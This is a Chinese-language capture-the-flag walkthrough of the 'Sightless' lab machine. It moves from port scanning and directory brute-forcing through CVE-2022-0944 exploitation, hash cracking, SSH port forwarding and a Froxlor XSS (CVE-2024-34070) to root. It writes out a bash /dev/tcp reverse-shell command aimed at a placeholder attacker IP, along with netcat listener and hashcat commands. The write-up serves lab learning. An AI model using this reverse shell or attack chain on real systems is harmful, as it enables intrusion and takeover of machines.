记一次渗透测试实战之Sightless
字数 1117 2025-08-22 12:23:30
渗透测试实战:Sightless 靶场渗透教学文档
信息收集阶段
1. 端口扫描
使用nmap进行初始端口探测:
nmap -sS -T4 <目标IP>
发现开放端口:
- 21 (FTP)
- 22 (SSH)
- 80 (HTTP)
2. FTP服务检查
尝试FTP未授权访问:
ftp <目标IP>
发现未授权访问不可行,需要进一步验证是否需要认证
3. Web目录爆破
使用工具进行目录爆破(可选用dirb、gobuster等):
gobuster dir -u http://<目标IP> -w /path/to/wordlist.txt
未发现有用路径,转向80端口Web应用分析
Web应用渗透
1. 主页分析
访问http://<目标IP>,发现:
- 存在数据库调用页面
- 右上角有交互式菜单功能
2. 漏洞搜索
使用Google搜索相关CVE漏洞,发现:
- CVE-2022-0944(远程代码执行漏洞)
3. 漏洞利用
使用CVE-2022-0944的POC进行攻击:
- 本地设置监听:
nc -lvnp 4444
- 执行POC攻击,获取webshell
内网渗透
1. 环境确认
发现当前环境运行在Docker容器中,检查用户:
ls /home
发现两个用户目录
2. 密码恢复与爆破
- 从系统中恢复密码哈希
- 使用hashcat或john进行爆破:
hashcat -m <hash类型> hash.txt /path/to/wordlist.txt
成功获取用户密码
3. SSH登录
使用爆破得到的密码登录SSH:
ssh username@<目标IP>
成功登录后获取user.txt标志
4. 权限检查
检查当前用户权限:
sudo -l
发现michael用户无法运行sudo
深入渗透
1. 配置文件检查
检查系统默认配置:
find / -name "*.conf" 2>/dev/null
netstat -tulnp
发现8000端口服务
2. 端口转发
使用SSH进行本地端口转发:
ssh -L 8000:localhost:8000 username@<目标IP>
然后本地访问http://localhost:8000
3. Chrome调试分析
发现Web应用使用Chrome调试:
- 检查Chrome进程:
ps aux | grep chrome
发现使用参数--remote-debugging-port=0(随机高端口)
- 检查网络连接确定实际端口:
netstat -tulnp
权限提升
1. 发现新漏洞
识别系统为Froxlor服务器管理软件,存在:
- CVE-2024-34070(存储型XSS漏洞)
- 影响版本:2.1.9之前
- 漏洞位置:loginname参数的日志记录功能
2. 环境确认
检查PHP版本:
php -v
发现为PHP 8.1.2
3. PHP-FPM远程代码执行
发现一处功能点可执行命令:
- 写入反弹shell脚本:
echo "bash -i >& /dev/tcp/<攻击者IP>/4444 0>&1" > shell.sh
chmod +x shell.sh
- 执行脚本获取反弹shell
4. 获取root权限
成功利用漏洞获取root权限,完成渗透测试
总结
本次渗透测试路径:
- 信息收集 → 2. Web漏洞利用 → 3. 初始立足点 → 4. 内网横向移动 → 5. 权限提升
关键漏洞利用点:
- CVE-2022-0944(初始Web应用RCE)
- CVE-2024-34070(Froxlor存储型XSS)
- PHP-FPM远程代码执行(最终权限提升)